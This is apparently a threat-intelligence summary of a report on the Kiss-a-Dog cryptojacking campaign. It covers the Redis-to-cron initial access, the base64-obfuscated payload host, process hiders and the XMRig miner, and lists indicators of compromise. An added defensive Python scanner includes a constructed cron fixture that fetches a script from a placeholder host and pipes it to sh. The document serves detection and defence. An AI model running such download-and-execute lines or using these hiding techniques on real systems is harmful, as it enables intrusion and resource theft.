Kiss-a-Dog Discovered Utilizing a 20-Year-Old Process Hider

Kiss-a-Dog, a cryptojacking campaign, has evolved to broaden its reach from Docker/Kubernetes to Redis-based targets, introducing a 20-year-old open-source process hider and other payloads like Tsunami and XMRig. The variant uses Redis for initial access, downloads payloads via cron, and employs several stealth techniques to disguise mining activities. #Kiss-a-Dog #XHide #XMRig #Tsunami #Diamorphine #libprocesshider #WatchDog

Keypoints

  • Kiss-a-Dog now employs a Redis-based initial access pattern, abusing cron to execute code on compromised nodes.
  • The campaign downloads a first-stage shell script and a second-stage payload (b.sh) from kiss[.]a-dog[.]top, encoding the domain in base64 for on-the-fly decoding when the job runs.
  • The ai.sh script decodes a payload URL and retrieves a tarball (xm.jpg) containing a hidden start script that selects architecture-specific XMRig binaries.
  • The start script launches a process hider (XHide) to conceal the mining process, masquerading as Sendmail.
  • XHide and other open-source hiders (Diamorphine, libprocesshider) are used to evade detection and persist across campaigns.
  • There is evidence of a test confirming XHide’s effectiveness, showing a high-CPU process masquerading as legitimate software.
  • The article highlights a trend of cloud cryptojacking relying on multiple open-source process hiders for redundancy and stealth, with expectations of continued evolution.

MITRE Techniques

  • [T1053.003] Cron – Redis is abused so that its database file lands where the cron scheduler reads it; the file is then interpreted as a cron job, giving arbitrary code execution. ‘the cron scheduler runs, the database file is read and interpreted as a cron job, resulting in arbitrary code execution.’
  • [T1105] Ingress Tool Transfer – Redis is used to download and execute an initialisation shell script on the compromised node. ‘download and execute an initialisation shell script on the compromised node.’
  • [T1105] Ingress Tool Transfer – The campaign downloads a second-stage payload (b.sh) from kiss[.]a-dog[.]top. ‘second stage payload (b.sh), hosted at the kiss[.]a-dog[.]top domain.’
  • [T1059.004] Unix Shell – ai.sh is a small shell script that logs, assigns variables and decodes the URL of the next payload. ‘The script begins with a log statement and some variable assignment, including the decoding of the following payload URL.’
  • [T1027] Obfuscated/Compressed Files and Information – The domain is stored base64-encoded and decoded on the fly when the job executes. ‘encoded in base64 and then decoded on the fly when the job executes.’
  • [T1574.002] Hijack Execution Flow – LD_PRELOAD dynamic linker hijacking is used to load the process hider code into other processes. ‘LD Preload dynamic linker hijacking technique.’
  • [T1014] Rootkit – Diamorphine, an open-source LKM rootkit, is used to hide a malicious process. ‘Diamorphine, an open source LKM rootkit for Linux kernel versions 2.6 and newer.’
  • [T1036] Masquerading – The mining process masquerades as Sendmail, a Linux mail transfer agent. ‘masquerading as Sendmail, a Linux email transfer agent.’
  • [T1496] Resource Hijacking – XMRig mines cryptocurrency on the compromised host, consuming its CPU. ‘Mining cryptocurrency is incredibly resource intensive.’
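Three host-side checks a defender could run for the behaviours listed above (a cron job that decodes base64 at run time, an unexpected entry in ld.so.preload, and a high-CPU process claiming to be Sendmail), written here as an added Python example; this is not code from the Cado article. The cron entries, the ld.so.preload content, the process rows, the `malicious.example` domain and the `/usr/sbin/sendmail` path are constructed assumptions; only the `kiss.a-dog.top` domain in the match list comes from the article.

```python
import base64
import binascii
import re

# Constructed sample data (not from the Cado article). The second cron entry
# mimics the pattern the article describes: a base64 blob decoded at run time
# to build a download URL. The domain it decodes to is a placeholder.
PLACEHOLDER_DOMAIN = "malicious.example"
SAMPLE_CRON = (
    "# constructed: a benign scheduled job\n"
    "0 3 * * * /usr/bin/certbot renew --quiet\n"
    "# constructed: job that rebuilds its download host from base64 at run time\n"
    '*/5 * * * * sh -c "curl -fsSL http://$(echo '
    + base64.b64encode(PLACEHOLDER_DOMAIN.encode()).decode()
    + ' | base64 -d)/b.sh | sh"\n'
)

# Constructed /etc/ld.so.preload content: one shared object nobody installed on purpose.
SAMPLE_LD_PRELOAD = "/usr/local/lib/libprocesshider.so\n"

# Constructed process table rows: (pid, comm, exe path, %CPU).
SAMPLE_PROCS = [
    (812, "sendmail", "/usr/sbin/sendmail", 0.3),
    (4471, "sendmail", "/tmp/.hidden/mining", 98.7),   # constructed masquerade
    (4490, "xmrig", "/tmp/.hidden/xmrig", 97.1),       # constructed, undisguised
]

# Domains to compare decoded tokens against: the article's IoC plus the placeholder.
KNOWN_DOMAINS = {"kiss.a-dog.top", PLACEHOLDER_DOMAIN}

# Assumption: Debian-style location of the real Sendmail binary.
EXPECTED_EXE = {"sendmail": "/usr/sbin/sendmail"}

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{8,}={0,2}")
DECODE_HINT = re.compile(r"base64\s+(?:-d|--decode)\b")


def decode_tokens(line):
    """Return printable ASCII decodings of every base64-looking token on a line."""
    decoded = []
    for tok in B64_TOKEN.findall(line):
        try:
            raw = base64.b64decode(tok, validate=True)
        except (binascii.Error, ValueError):
            continue
        text = raw.decode("ascii", errors="ignore")
        if text and text.isprintable():
            decoded.append(text)
    return decoded


def scan_cron(text):
    """Flag cron lines that decode base64 at run time or embed a known domain.
    Returns a list of (line number, reasons)."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        reasons = []
        if DECODE_HINT.search(line):
            reasons.append("runtime base64 decode")
        for text_out in decode_tokens(line):
            for dom in sorted(KNOWN_DOMAINS):
                if dom in text_out:
                    reasons.append(f"base64 token decodes to known domain {dom}")
        if reasons:
            findings.append((lineno, reasons))
    return findings


def scan_ld_preload(text, allowlist=()):
    """Return every library named in ld.so.preload that is not explicitly allowed."""
    return [
        entry.strip()
        for entry in text.splitlines()
        if entry.strip() and entry.strip() not in allowlist
    ]


def check_processes(rows, expected_exe, cpu_threshold=90.0):
    """Flag processes whose name claims a known binary but whose exe path differs,
    and any process at or above the CPU threshold. Returns (pid, reasons) pairs."""
    flagged = []
    for pid, comm, exe, cpu in rows:
        reasons = []
        if comm in expected_exe and exe != expected_exe[comm]:
            reasons.append(f"{comm} runs from {exe}, expected {expected_exe[comm]}")
        if cpu >= cpu_threshold:
            reasons.append(f"cpu {cpu}% >= {cpu_threshold}%")
        if reasons:
            flagged.append((pid, reasons))
    return flagged


if __name__ == "__main__":
    for lineno, reasons in scan_cron(SAMPLE_CRON):
        print(f"cron line {lineno}: {'; '.join(reasons)}")
    for lib in scan_ld_preload(SAMPLE_LD_PRELOAD):
        print(f"ld.so.preload loads unexpected library: {lib}")
    for pid, reasons in check_processes(SAMPLE_PROCS, EXPECTED_EXE):
        print(f"pid {pid}: {'; '.join(reasons)}")
```

On a real host the inputs would be the files under /var/spool/cron and /etc/cron.d, the contents of /etc/ld.so.preload, and a process listing; the base64 heuristic is intentionally broad, so pair the "runtime base64 decode" reason with the decoded-domain match before raising a high-severity alert. Note that a user-space hider loaded through ld.so.preload can filter what a process listing returns, which is why the ld.so.preload check and the cron check matter independently of the process check.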

Indicators of Compromise

  • [SHA-256] b.sh – 32ef38ddc86061cb9280f884e5a22f333893e153f9bc5cf2159dd0ac4419d86a
  • [SHA-256] ai.sh – e9b64e1e468c943348c2885613100bb20c6d67f14619483c46532bf6323cff17
  • [SHA-256] start – 0f1e5ab87d39835c6c28f242e68f7855a57813ef8e3e07091eee4f4d4f7ef78d
  • [SHA-256] xm.jpg – 97c571621824c8473506dcf332f604a8eea1eb7ed71a6a0ce07a551cc42077ff
  • [SHA-256] hide – 3f1e584ca9393a3f635d8a8573e5b7f863df0dc092911de03bffc2d4ab4f8b53
  • [SHA-256] hide.c – b1f5032c0abab0e185b90a5cacaecd6af2d10974ea2a8f9676732413bcff1424
  • [SHA-256] mining – 8f93a7dd12dbd84749cb5cf675cd8371bd732655a8d048f269d8e88e8136e2e3
  • [URL] payload tarball (xm.jpg) – http://kiss[.]a-dog[.]top/b2f628/m/xm.jpg
  • [Domain] payload host – kiss[.]a-dog[.]top

Read more: https://www.cadosecurity.com/kiss-a-dog-discovered-utilizing-a-20-year-old-process-hider/